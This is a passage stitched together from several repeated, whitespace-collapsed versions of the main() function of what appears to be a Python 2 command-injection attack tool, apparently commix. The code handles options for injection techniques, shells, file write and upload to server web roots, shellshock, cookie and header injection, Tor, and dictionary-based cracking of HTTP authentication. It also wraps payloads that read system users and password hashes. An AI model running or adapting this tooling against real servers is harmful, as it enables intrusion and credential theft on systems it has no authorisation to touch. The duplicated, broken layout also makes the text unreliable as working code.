http://www.w3schools.com/html/html_charset.asp # Check if HTML4 format content = re.findall(r";charset=(.*)\"", html_data) if len(content) != 0 : charset = content else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*?)['\"]", html_data) if len(charset) != 0 : settings.CHARSET = charset[len(charset)-1] if settings.CHARSET.lower() not in settings.CHARSET_LIST: print Fore.YELLOW + settings.WARNING_SIGN + "The indicated web-page charset " + settings.CHARSET + " seems unknown." + Style.RESET_ALL else: if menu.options.verbose: print Style.BRIGHT + "(!) The indicated web-page charset appears to be " + Style.UNDERLINE + settings.CHARSET + Style.RESET_ALL + "." + Style.RESET_ALL # Retrieve everything from the supported enumeration options. if menu.options.enum_all: checks.enable_all_enumeration_options() except urllib2.HTTPError, e: # Check the codes of responses if e.getcode() == 500: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" content = e.read() sys.exit(0) # Check for HTTP Error 401 (Unauthorized). elif e.getcode() == 401: try: # Get the auth header value auth_line = e.headers.get('www-authenticate', '') # Checking for authentication type name. auth_type = auth_line.split()[0] settings.SUPPORTED_HTTP_AUTH_TYPES.index(auth_type.lower()) # Checking for the realm attribute. try: auth_obj = re.match('''(\w*)\s+realm=(.*)''', auth_line).groups() realm = auth_obj[1].split(',')[0].replace("\"", "") except: realm = False except ValueError: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + settings.ERROR_SIGN + "The identified HTTP authentication type (" + auth_type + ") is not yet supported." + Style.RESET_ALL + "\n" sys.exit(0) except IndexError: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" error_msg = "The provided pair of " + menu.options.auth_type error_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'" error_msg += " seems to be invalid." print Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL sys.exit(0) print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if menu.options.auth_type and menu.options.auth_type != auth_type.lower(): if checks.identified_http_auth_type(auth_type): menu.options.auth_type = auth_type.lower() else: menu.options.auth_type = auth_type.lower() # Check for stored auth credentials. if not menu.options.auth_cred: try: stored_auth_creds = session_handler.export_valid_credentials(url, auth_type.lower()) except: stored_auth_creds = False if stored_auth_creds: menu.options.auth_cred = stored_auth_creds print Style.BRIGHT + "(!) Identified a valid pair of credentials '" + Style.UNDERLINE + menu.options.auth_cred + Style.RESET_ALL + Style.BRIGHT + "'." + Style.RESET_ALL else: # Basic authentication if menu.options.auth_type == "basic": if not menu.options.ignore_401: print Fore.YELLOW + settings.WARNING_SIGN + "(" + menu.options.auth_type.capitalize() + ")" + " HTTP authentication credentials are required." + Style.RESET_ALL while True: crack_creds = raw_input(settings.QUESTION_SIGN + "Do you want to perform a dictionary-based attack? [Y/n/q] > ").lower() if crack_creds in settings.CHOICE_YES: auth_creds = authentication.http_auth_cracker(url, realm) if auth_creds != False: menu.options.auth_cred = auth_creds settings.REQUIRED_AUTHENTICATION = True break else: sys.exit(0) elif crack_creds in settings.CHOICE_NO: checks.http_auth_error_msg() elif crack_creds in settings.CHOICE_QUIT: sys.exit(0) else: if crack_creds == "": crack_creds = "enter" print Back.RED + settings.ERROR_SIGN + "'" + crack_creds + "' is not a valid answer." + Style.RESET_ALL + "\n" pass # Digest authentication elif menu.options.auth_type == "digest": if not menu.options.ignore_401: print Fore.YELLOW + settings.WARNING_SIGN + "(" + menu.options.auth_type.capitalize() + ")" + " HTTP authentication credentials are required." + Style.RESET_ALL # Check if heuristics have failed to identify the realm attribute. if not realm: warn_msg = "Heuristics have failed to identify the realm attribute." print Fore.YELLOW + settings.WARNING_SIGN + warn_msg + Style.RESET_ALL while True: crack_creds = raw_input(settings.QUESTION_SIGN + "Do you want to perform a dictionary-based attack? [Y/n/q] > ").lower() if crack_creds in settings.CHOICE_YES: auth_creds = authentication.http_auth_cracker(url, realm) if auth_creds != False: menu.options.auth_cred = auth_creds settings.REQUIRED_AUTHENTICATION = True break else: sys.exit(0) elif crack_creds in settings.CHOICE_NO: checks.http_auth_error_msg() elif crack_creds in settings.CHOICE_QUIT: sys.exit(0) else: if crack_creds == "": crack_creds = "enter" print Back.RED + settings.ERROR_SIGN + "'" + crack_creds + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: checks.http_auth_error_msg() else: pass elif e.getcode() == 403: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + settings.ERROR_SIGN + "You don't have permission to access this page." + Style.RESET_ALL sys.exit(0) elif e.getcode() == 404: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + settings.ERROR_SIGN + "The host seems to be down!" + Style.RESET_ALL sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + settings.ERROR_SIGN + "The host seems to be down!" + Style.RESET_ALL sys.exit(0)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) #Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() #Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True if split_techniques_names[i].replace( ' ', '' ) not in settings.AVAILABLE_TECHNIQUES and found_tech == False: print Back.RED + "(x) Error: You specified wrong '" + split_techniques_names[ i] + "' injection technique." + Style.RESET_ALL print Back.RED + "(x) The available techniques are: classic,eval-based,time-based,file-based or c,e,t,f (with or without commas)." + Style.RESET_ALL sys.exit(0) #Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: print Back.RED + "(x) Error: '" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check if specified file-access options # Check if not defined "--file-dest" option. if menu.options.file_dest == None: # Check if defined "--file-write" option. if menu.options.file_write: file_name = os.path.split(menu.options.file_write)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # Check if defined "--file-upload" option. if menu.options.file_upload: file_name = os.path.split(menu.options.file_upload)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name elif menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) #Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) #Check if defined "--url" option. if menu.options.url: sys.stdout.write("(*) Checking connection to the target URL... ") sys.stdout.flush() url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url try: request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) response = urllib2.urlopen(request) content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" #Check if defined "--tor" option. if menu.options.tor: tor.do_check() except urllib2.HTTPError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" # Check the codes of responses if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print Back.RED + "(x) Error: Only 'Basic' Access Authentication is supported." + Style.RESET_ALL sys.exit(0) else: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 404: print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL + "\n" sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL + "\n" sys.exit(0)
def main(): try: # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and found_tech == False: print Back.RED + "(x) Error: You specified wrong '" + split_techniques_names[i] + "' injection technique." + Style.RESET_ALL print Back.RED + "(x) The available techniques are: classic,eval-based,time-based,file-based or c,e,t,f (with or without commas)." + Style.RESET_ALL sys.exit(0) # Cookie Injection if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: settings.COOKIE_INJECTION = True # User-Agent Injection if menu.options.agent and settings.INJECT_TAG in menu.options.agent: settings.USER_AGENT_INJECTION = True # Referer Injection if menu.options.referer and settings.INJECT_TAG in menu.options.referer: settings.REFERER_INJECTION = True # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: print Back.RED + "(x) Error: '" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: print Back.RED + "(x) Error: Host's absolute filepath to write and/or upload, must be specified (--file-dest)." + Style.RESET_ALL sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): print Back.RED + "(x) Error: The '"+ menu.options.file_upload + "' is not a valid URL. " + Style.RESET_ALL sys.exit(0) # # Check if specified file-access options # # Check if not defined "--file-dest" option. # if menu.options.file_dest == None: # # Check if defined "--file-write" option. # if menu.options.file_write: # file_name = os.path.split(menu.options.file_write)[1] # menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # # Check if defined "--file-upload" option. # if menu.options.file_upload: # file_name = os.path.split(menu.options.file_upload)[1] # menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # elif menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : # print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL # sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: request = urllib2.Request(url) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() sys.stdout.write("(*) Checking connection to the target URL... ") sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) except: raise html_data = response.read() content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" try: if response.info()['server'] : server_banner = response.info()['server'] found_server_banner = False for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if menu.options.verbose: print Style.BRIGHT + "(!) The server was identified as " + Style.UNDERLINE + server_banner + Style.RESET_ALL + "." + Style.RESET_ALL settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" break if found_server_banner != True: print Fore.YELLOW + "(^) Warning: The server which was identified as " + server_banner + " seems unknown." + Style.RESET_ALL except KeyError: pass # Charset detection [1]. # [1] http://www.w3schools.com/html/html_charset.asp # Check if HTML4 format content = re.findall(r";charset=(.*)\"", html_data) if len(content) != 0 : charset = content else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*?)['\"]", html_data) if len(charset) != 0 : settings.CHARSET = charset[len(charset)-1] if settings.CHARSET.lower() not in settings.CHARSET_LIST: print Fore.YELLOW + "(^) Warning: The indicated web-page charset " + settings.CHARSET + " seems unknown." + Style.RESET_ALL else: if menu.options.verbose: print Style.BRIGHT + "(!) The indicated web-page charset appears to be " + Style.UNDERLINE + settings.CHARSET + Style.RESET_ALL + "." + Style.RESET_ALL except urllib2.HTTPError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" # Check the codes of responses if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print Back.RED + "(x) Error: Only 'Basic' Access Authentication is supported." + Style.RESET_ALL sys.exit(0) else: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL sys.exit(0) elif e.getcode() == 404: print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL sys.exit(0)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) #Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: print colors.BGRED + "(x) Error: Specified wrong injection technique!" + colors.RESET sys.exit(0) #Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: print colors.BGRED + "(x) Error: '" + menu.options.alter_shell + "' shell is not supported!" + colors.RESET sys.exit(0) # Check if specified file-access options if menu.options.file_dest == None: if menu.options.file_write: file_name = os.path.split(menu.options.file_write)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name elif menu.options.file_dest and menu.options.file_write == None : print colors.BGRED + "(x) Error: You must enter the '--file-write' parameter." + colors.RESET sys.exit(0) #Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) #Check if defined "--url" option. if menu.options.url: sys.stdout.write("(*) Checking connection to the target URL... ") sys.stdout.flush() url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url try: request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) response = urllib2.urlopen(request) content = response.read() print "[ " + colors.GREEN + "SUCCEED" + colors.RESET + " ]" except urllib2.HTTPError, e: print "[ " + colors.RED + "FAILED" + colors.RESET + " ]" if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print colors.BGRED + "(x) Error: Only 'Basic' Access Authentication is supported." + colors.RESET sys.exit(0) else: print colors.BGRED + "(x) Error: Authorization required!" + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 403: print colors.BGRED + "(x) Error: You don't have permission to access this page." + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 404: print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET + "\n" sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + colors.RED + "FAILED" + colors.RESET + " ]" print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET + "\n" sys.exit(0)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) if menu.options.url: print "\n(*) Initializing, please wait... " url = menu.options.url try: request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) response = urllib2.urlopen(request) content = response.read() except urllib2.HTTPError, e: if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: print colors.RED + "(x) Error: Authorization required!\n" + colors.RESET sys.exit(0) elif e.getcode() == 404: print colors.RED + "(x) Error: The host seems to be down!\n" + colors.RESET sys.exit(0) else: raise except urllib2.URLError, e: print colors.RED + "(x) Error: The host seems to be down!" + colors.RESET sys.exit(0)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) #Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: print colors.BGRED + "(x) Error: Specified wrong injection technique!" + colors.RESET sys.exit(0) #Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) #Check if defined "--url" option. if menu.options.url: sys.stdout.write(colors.BOLD +"(*) Checking connection to the target URL... " + colors.RESET) sys.stdout.flush() url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url try: request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) #print request.headers response = urllib2.urlopen(request) content = response.read() print "[ " + colors.GREEN + "SUCCEED" + colors.RESET + " ]" except urllib2.HTTPError, e: print "[ " + colors.RED + "FAILED" + colors.RESET + " ]" if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: print colors.BGRED + "(x) Error: Authorization required!" + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 403: print colors.BGRED + "(x) Error: You don't have permission to access this page." + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 404: print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET + "\n" sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + colors.RED + "FAILED" + colors.RESET + " ]" print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET + "\n" sys.exit(0)
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and found_tech == False: print Back.RED + settings.ERROR_SIGN + "You specified wrong '" + split_techniques_names[i] + "' injection technique." + Style.RESET_ALL print Back.RED + "(x) The available techniques are: classic,eval-based,time-based,file-based or c,e,t,f (with or without commas)." + Style.RESET_ALL sys.exit(0) # Cookie Injection if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: settings.COOKIE_INJECTION = True # User-Agent Injection if menu.options.agent and settings.INJECT_TAG in menu.options.agent: settings.USER_AGENT_INJECTION = True # Referer Injection if menu.options.referer and settings.INJECT_TAG in menu.options.referer: settings.REFERER_INJECTION = True # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: print Back.RED + settings.ERROR_SIGN + "'" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: print Back.RED + settings.ERROR_SIGN + "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." + Style.RESET_ALL sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : print Back.RED + settings.ERROR_SIGN + "You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): print Back.RED + settings.ERROR_SIGN + "The '" + menu.options.file_upload + "' is not a valid URL. " + Style.RESET_ALL sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() sys.stdout.write(settings.INFO_SIGN + "Checking connection to the target URL... ") sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) except: raise html_data = response.read() content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" try: if response.info()['server'] : server_banner = response.info()['server'] found_os_server = False for i in range(0,len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower() in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft" : identified_os = "Windows" settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: print Back.RED + settings.CRITICAL_SIGN + "The shellshock module is not available for " + identified_os + " tagets." + Style.RESET_ALL raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" found_server_banner = False for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if menu.options.verbose: print Style.BRIGHT + "(!) The server was identified as " + Style.UNDERLINE + server_banner + Style.RESET_ALL + "." + Style.RESET_ALL settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower() == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root : print Fore.YELLOW + settings.WARNING_SIGN + "Swithing '--is-root' to '--is-admin' because the taget has been identified as windows." + Style.RESET_ALL error_msg = settings.WARNING_SIGN + "The '--passwords' option, is not yet available for Windows targets." if menu.options.passwords: print Fore.YELLOW + settings.WARNING_SIGN + "The '--passwords' option, is not yet available for Windows targets." + Style.RESET_ALL if menu.options.file_upload : print Fore.YELLOW + settings.WARNING_SIGN + "The '--file-upload' option, is not yet available for windows targets. Instead, use the '--file-write' option." + Style.RESET_ALL sys.exit(0) else: if menu.options.is_admin : print Fore.YELLOW + settings.WARNING_SIGN + "Swithing the '--is-admin' to '--is-root' because the taget has been identified as unix-like. " + Style.RESET_ALL if found_os_server == False: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: print Fore.YELLOW + settings.WARNING_SIGN + "Heuristics have failed to identify server's operating system." + Style.RESET_ALL while True: got_os = raw_input(settings.QUESTION_SIGN + "Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > ").lower() if got_os.lower() in settings.CHOISE_OS : if got_os.lower() == "w": settings.TARGET_OS == "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" print Back.RED + settings.ERROR_SIGN + "'" + got_os + "' is not a valid answer." + Style.RESET_ALL + "\n" pass if found_server_banner == False : print Fore.YELLOW + settings.WARNING_SIGN + "The server which was identified as " + server_banner + " seems unknown." + Style.RESET_ALL except KeyError: pass # Charset detection [1]. # [1] http://www.w3schools.com/html/html_charset.asp # Check if HTML4 format content = re.findall(r";charset=(.*)\"", html_data) if len(content) != 0 : charset = content else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*?)['\"]", html_data) if len(charset) != 0 : settings.CHARSET = charset[len(charset)-1] if settings.CHARSET.lower() not in settings.CHARSET_LIST: print Fore.YELLOW + settings.WARNING_SIGN + "The indicated web-page charset " + settings.CHARSET + " seems unknown." + Style.RESET_ALL else: if menu.options.verbose: print Style.BRIGHT + "(!) The indicated web-page charset appears to be " + Style.UNDERLINE + settings.CHARSET + Style.RESET_ALL + "." + Style.RESET_ALL except urllib2.HTTPError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" # Check the codes of responses if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print Back.RED + settings.ERROR_SIGN + "Only 'Basic' Access Authentication is supported." + Style.RESET_ALL sys.exit(0) else: print Back.RED + settings.ERROR_SIGN + "Authorization required!" + Style.RESET_ALL sys.exit(0) elif e.getcode() == 403: print Back.RED + settings.ERROR_SIGN + "You don't have permission to access this page." + Style.RESET_ALL sys.exit(0) elif e.getcode() == 404: print Back.RED + settings.ERROR_SIGN + "The host seems to be down!" + Style.RESET_ALL sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + settings.ERROR_SIGN + "The host seems to be down!" + Style.RESET_ALL sys.exit(0)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) if menu.options.url: print "(*) Initializing, please wait... " url = menu.options.url try: request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) #print request.headers response = urllib2.urlopen(request) content = response.read() except urllib2.HTTPError, e: if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: print colors.BGRED + "(x) Error: Authorization required!" + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 403: print colors.BGRED + "(x) Error: You don't have permission to access this page." + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 404: print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET + "\n" sys.exit(0) else: raise except urllib2.URLError, e: print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET + "\n" sys.exit(0)
